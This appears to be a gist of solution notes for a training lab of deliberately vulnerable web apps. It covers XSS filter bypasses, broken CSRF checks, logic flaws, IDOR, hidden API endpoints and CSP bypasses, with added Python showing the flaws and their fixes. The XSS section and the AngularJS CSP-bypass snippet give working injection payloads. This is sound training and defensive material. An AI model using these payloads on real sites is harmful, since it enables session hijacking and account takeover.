Last active
September 21, 2021 22:08
Servers
---------------------------
XSS
---------------------------
http://23.239.9.22/cheeseBlog Basic stored XSS on homepage
Solution:
http://23.239.9.22/cheeseBlog-1 Basic reflected XSS on search page
Solution:
http://23.239.9.22/cheeseBlog-2 Filtered reflected XSS on search page
Solution: <img src=x onmouseover=confirm()>
http://23.239.9.22/cheeseBlog-3 HTML tag injection into input
Solution: ' onmouseover=alert() '
http://23.239.9.22/cheeseBlog-4 Almost everything except onclick is blocked
Solution: <img src=x onclick=confirm()>
http://23.239.9.22/cheeseBlog-11 For the first 10 characters it filters <
Solution: gdfhhgjhgjnhgjhgjghj<img src=x onclick=confirm()>
http://23.239.9.22/cheeseBlog-12 This is really hard: there is a hidden input field on the category page, and it is vulnerable to attribute injection
Solution: ' accesskey=X onclick=alert(1) ' in the title field
Then you need to go to categories and press alt+shift+x
You can only have this ONCE on the page and it only works in FF. You can break all the code after it but people will start noticing. x='
http://23.239.9.22/cheeseBlog-13
You need to do directory brute forcing to find images.php
There you need to enter the following attack vector: <img src=x onclick=confirm()>
This is because alert is blocked
http://23.239.9.22/cheeseBlog-14
A lot is filtered here
- You need a null byte SOMEWHERE in the payload (%00)
- No img tags, BUT this is filtered BEFORE the lowercasing AND I am also filtering Img, so you need to use the iMg tag
- It will convert the search query to a lowercase string
All of this is filtered AFTER toLowerCase:
- No SVG allowed
- No scripts
- No alert
- No confirm
http://23.239.9.22/cheeseBlog-14/search.php?q=fdsfniose0dffdsfsdffds%3CiMg%2500src%3Dx%2500onerror%3Dprompt%28%29%3E
http://23.239.9.22/cheeseBlog-15
You will need double encoding here: http://23.239.9.22/cheeseBlog-15/search.php?q=%25253cimg+src%3Dx%3E
%25 URL-decodes into %
%3c into <
%3e into >
http://23.239.9.22/xss-post/
<img src=x onclick=alert()>, onclick is allowed, the rest is not
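Two of the filters above fail for reasons worth seeing side by side: cheeseBlog-14 runs part of its blocklist before lowercasing (so a case variant slips through and is only then normalised into a working tag), and cheeseBlog-15 decodes the query a second time after the filter has run (so %253c is still %3c when the filter looks at it). The Python below is an added example, not the lab's PHP; it models those two orderings next to the fix (canonicalise first, decode exactly once, and HTML-encode on output) using constructed sample inputs taken from the notes.

```python
import html
from urllib.parse import unquote

# Constructed sample inputs: the mixed-case tag from the cheeseBlog-14 note and
# a double-encoded tag in the style of cheeseBlog-15 (null bytes left out).
MIXED_CASE = "<iMg src=x onerror=prompt()>"
DOUBLE_ENCODED = "%253cimg src=x%253e"


def blocklist_before_lowercase(q: str) -> str:
    """Models the cheeseBlog-14 ordering: one blocklist runs before the
    lowercasing and a second one after it. A value that differs only in case
    from the first list (iMg vs img/Img) passes the first pass and is then
    lowercased into a working tag by the very normalisation meant to help."""
    for word in ("img", "Img"):
        q = q.replace(word, "")
    q = q.lower()
    for word in ("svg", "script", "alert", "confirm"):
        q = q.replace(word, "")
    return q


def blocklist_after_lowercase(q: str) -> str:
    """Same words, but the input is canonicalised first, so case games
    no longer matter (the blocklist itself is still not a real fix)."""
    q = q.lower()
    for word in ("img", "svg", "script", "alert", "confirm"):
        q = q.replace(word, "")
    return q


def strip_angle_brackets(q: str) -> str:
    return q.replace("<", "").replace(">", "")


def filter_then_decode_again(encoded: str) -> str:
    """Models the cheeseBlog-15 behaviour (an assumption drawn from the
    'double encoding' hint): the web server decodes the query once, the
    filter runs, and the application then decodes the value a second time.
    '%253c' reaches the filter as '%3c' and only becomes '<' afterwards."""
    once = unquote(encoded)            # what the server hands the script
    filtered = strip_angle_brackets(once)
    return unquote(filtered)           # the extra decode the app should not do


def decode_once_then_encode_output(encoded: str) -> str:
    """Fix: decode exactly once, then HTML-encode when rendering."""
    return html.escape(unquote(encoded), quote=True)


def render_safely(q: str) -> str:
    """Output encoding makes the blocklist irrelevant: '<', '>', '&' and
    quotes become entities, so user input can neither open a tag nor break
    out of an attribute, whatever its case or encoding."""
    return html.escape(q, quote=True)


if __name__ == "__main__":
    print("before-lowercase filter :", blocklist_before_lowercase(MIXED_CASE))
    print("after-lowercase filter  :", blocklist_after_lowercase(MIXED_CASE))
    print("filter, then decode     :", filter_then_decode_again(DOUBLE_ENCODED))
    print("decode once, encode out :", decode_once_then_encode_output(DOUBLE_ENCODED))
    print("encoded output          :", render_safely(MIXED_CASE))
```

The point of the last two functions is that the order of the blocklist stops mattering once the value is decoded once and encoded for the context it is written into; a blocklist is at best a second layer.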
CSRF
------------------------------------
http://23.239.9.22/cheeseBlog-5 CSRF on admin field
Solution: On the edit field in the admin there is a CSRF hidden field,
but the server never checks it, only that it's there
http://23.239.9.22/cheeseBlog-7 CSRF on admin field
Solution: On the edit field in the admin there is a CSRF hidden field,
but the server never even checks if it's there
http://23.239.9.22/cheeseBlog-8 CSRF on admin field
Solution: Should be safe
http://23.239.9.22/cheeseBlog-9 CSRF on admin field
Solution: On the edit field in the admin there is a CSRF hidden field,
but the server only checks if the token has the correct length
http://23.239.9.22/cheeseBlog-10 CSRF on admin field on experimental page
Solution: On the edit page in the admin section there is a hidden field referring to edit2.php;
this page just checks if the CSRF token is set
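The four broken checks above (present but never compared, never looked at, length only, merely set) share one defect: none of them ties the submitted value to the session that rendered the form. The Python below is an added example, not the lab's PHP, putting those checks next to a correct one; the session dict and the form dicts are constructed stand-ins for the real request handling.

```python
import hmac
import secrets

TOKEN_HEX_LEN = 64  # 32 random bytes, hex-encoded


def issue_token(session: dict) -> str:
    """Called when the edit form is rendered: mint a random token, keep it in
    the server-side session and put the same value in the hidden field."""
    token = secrets.token_hex(TOKEN_HEX_LEN // 2)
    session["csrf_token"] = token
    return token


# The checks the notes describe, kept here only to show what each one misses.
def check_presence_only(form: dict, session: dict) -> bool:
    # cheeseBlog-5 and cheeseBlog-10: the field must exist, its value is never compared
    return bool(form.get("csrf_token"))


def check_nothing(form: dict, session: dict) -> bool:
    # cheeseBlog-7: the hidden field is emitted but never read back
    return True


def check_length_only(form: dict, session: dict) -> bool:
    # cheeseBlog-9: any string of the right length passes
    return len(form.get("csrf_token", "")) == TOKEN_HEX_LEN


def check_against_session(form: dict, session: dict) -> bool:
    """Correct check: the submitted value must equal the token stored for this
    session. compare_digest keeps the comparison constant-time."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def handle_edit(form: dict, session: dict, check) -> str:
    """Apply one of the checks to an admin edit request."""
    return "updated" if check(form, session) else "rejected"


def cross_site_form() -> dict:
    """Constructed: a form posted from another origin. It cannot read the
    victim's session token, so the value it carries is at best a guess of the
    right length."""
    return {"title": "changed", "csrf_token": secrets.token_hex(TOKEN_HEX_LEN // 2)}


if __name__ == "__main__":
    session = {}
    legit = {"title": "ok", "csrf_token": issue_token(session)}
    for name, check in (("presence", check_presence_only), ("nothing", check_nothing),
                        ("length", check_length_only), ("session", check_against_session)):
        print(f"{name:8} legit={handle_edit(legit, session, check)} "
              f"cross-site={handle_edit(cross_site_form(), session, check)}")
```

Only the session-bound comparison rejects the cross-site form while still accepting the legitimate one; the other three accept both.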
Logic flaws
---------------------------
http://23.239.9.22/CheeseShop Basic logic flaw on ordering a negative amount, but only on the cart page
Solution: enter a negative amount on the cart detail page
http://23.239.9.22/CheeseShop-1 Register with the same username = account takeover
Solution: Enter the same username as the admin user with your own email address and password
http://23.239.9.22/CheeseShop-3 The password is never checked, you can use any password
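The three shop flaws come down to one missing server-side check each: the cart page skips the quantity validation the product page has, registration does not enforce username uniqueness, and login never compares the password. The Python below is an added example (not the lab's PHP) with an in-memory user store and cart standing in for the shop's database; it applies the same quantity validator on every path, canonicalises usernames before the uniqueness check, and verifies a salted password hash.

```python
import hashlib
import hmac
import secrets

# Constructed stand-ins for the shop's database and catalogue.
USERS: dict[str, dict] = {}
CART: dict[str, int] = {}
PRICES = {"gouda": 12, "brie": 9}  # price per unit


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def _canonical(username: str) -> str:
    """One canonical form for uniqueness, so 'Admin', 'admin ' and 'ADMIN'
    cannot coexist as separate accounts."""
    return username.strip().lower()


def register(username: str, email: str, password: str) -> bool:
    key = _canonical(username)
    if key in USERS:
        return False  # CheeseShop-1: a second account with the same name is refused
    salt = secrets.token_bytes(16)
    USERS[key] = {"email": email, "salt": salt, "hash": _hash_password(password, salt)}
    return True


def login(username: str, password: str) -> bool:
    user = USERS.get(_canonical(username))
    if user is None:
        return False
    # CheeseShop-3: the password must actually be compared, in constant time.
    return hmac.compare_digest(user["hash"], _hash_password(password, user["salt"]))


def validate_quantity(raw) -> int:
    """Shared validator: integer, strictly positive, bounded."""
    try:
        qty = int(raw)
    except (TypeError, ValueError):
        raise ValueError("quantity must be an integer")
    if qty <= 0 or qty > 100:
        raise ValueError("quantity must be between 1 and 100")
    return qty


def add_to_cart(item: str, raw_qty) -> None:
    CART[item] = CART.get(item, 0) + validate_quantity(raw_qty)


def update_cart(item: str, raw_qty) -> None:
    # CheeseShop: the cart page must run the same check as the product page.
    CART[item] = validate_quantity(raw_qty)


def cart_total() -> int:
    return sum(PRICES[item] * qty for item, qty in CART.items())


if __name__ == "__main__":
    print(register("admin", "me@example.invalid", "s3cret"), register("Admin", "x@example.invalid", "pw"))
    print(login("admin", "s3cret"), login("admin", "anything"))
    add_to_cart("gouda", "2")
    try:
        update_cart("gouda", "-3")
    except ValueError as exc:
        print("rejected:", exc)
    print(cart_total())
```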
IDOR
---------------------------
http://23.239.9.22/cheesems - There is an IDOR in edit.php
http://23.239.9.22/cheesems-2 - There is a new name for the edit page and the link is always hidden
http://23.239.9.22/cheesems-3 - Endpoints are in the JS script
User submissions
-----------------
peskyRegex - @aspland_john
http://23.239.9.22/peskyRegex/
rot13 - @aspland_john
http://23.239.9.22/rot13/
sayHello - @aspland_john
http://23.239.9.22/sayHello/
twistedConversion - @aspland_john
http://23.239.9.22/twistedConversion/
base64 - @aspland_john
http://23.239.9.22/base64/
PinkSink - @xhzeem
http://23.239.9.22/PinkSink/
myEntity - @xhzeem
http://23.239.9.22/myEntity/
403Forbidden - @EnesSaltk7
http://23.239.9.22/403Forbidden/
recursive_nightmare - https://twitter.com/flex0geek
http://23.239.9.22/recursive_nightmare/
API labs
-----------------
Labs-5002 (Hidden id parameter)
You need to guess that there is an id parameter; it only shows 2 books, but the hidden book is id=3
http://23.239.9.22:5002/api/v1/resources/books?id=3
Labs-5000 (Hidden endpoint on v1)
http://23.239.9.22:5000/api/v2/resources/books/all
Find the hidden admin interface on http://23.239.9.22:5000/api/v1/admin
CSP Bypass
-----------------
http://23.239.9.22/xss-post-csp/
Very easy, simply enter alert() because unsafe-inline and unsafe-eval are both enabled
http://23.239.9.22/xss-post-csp2/
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
Load Angular from the Cloudflare domain
Create an alert from Angular
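Both CSP labs are weak for reasons visible in the policy text alone: 'unsafe-inline' and 'unsafe-eval' in script-src, and a whole library CDN allowed as a script source, which lets any library hosted there (AngularJS in the note above) run under the policy. The page does not show the labs' actual headers, so the Python below, an added example and not the lab's code, audits three constructed policies written to match the descriptions, and the nonce value in the strict one is made up.

```python
# Starting list of hosts that serve many third-party libraries. Allowing the
# whole host allows every library on it, not just the one the site uses.
LIBRARY_CDNS = {"cdnjs.cloudflare.com"}

# Constructed policies matching the two lab descriptions, plus a strict one.
WEAK_INLINE = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'"
WEAK_CDN = "default-src 'self'; script-src 'self' https://cdnjs.cloudflare.com"
STRICT = "default-src 'self'; script-src 'nonce-d3b07384d113' 'strict-dynamic'"


def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy: dict) -> list:
    """script-src falls back to default-src when it is absent."""
    return policy.get("script-src", policy.get("default-src", []))


def audit_script_src(header: str) -> list:
    """Return a list of findings for the effective script-src."""
    findings = []
    sources = [s.lower() for s in script_sources(parse_csp(header))]
    # Per CSP level 2+, a nonce or hash makes 'unsafe-inline' ignored.
    has_nonce_or_hash = any(s.startswith("'nonce-") or s.startswith("'sha") for s in sources)
    if "'unsafe-inline'" in sources and not has_nonce_or_hash:
        findings.append("'unsafe-inline': injected inline scripts and event handlers run")
    if "'unsafe-eval'" in sources:
        findings.append("'unsafe-eval': string-to-code (eval, Function) is allowed")
    for src in sources:
        host = src.split("://", 1)[-1].split("/", 1)[0]
        if host in LIBRARY_CDNS:
            findings.append(f"{host}: whole CDN allowed, any library hosted there can be loaded")
    return findings


if __name__ == "__main__":
    for name, policy in (("WEAK_INLINE", WEAK_INLINE), ("WEAK_CDN", WEAK_CDN), ("STRICT", STRICT)):
        print(name)
        for finding in audit_script_src(policy) or ["no findings"]:
            print("  -", finding)
```

The strict policy avoids both problems at once: a per-response nonce marks the site's own scripts, and 'strict-dynamic' lets them load what they need without naming a CDN host in the policy.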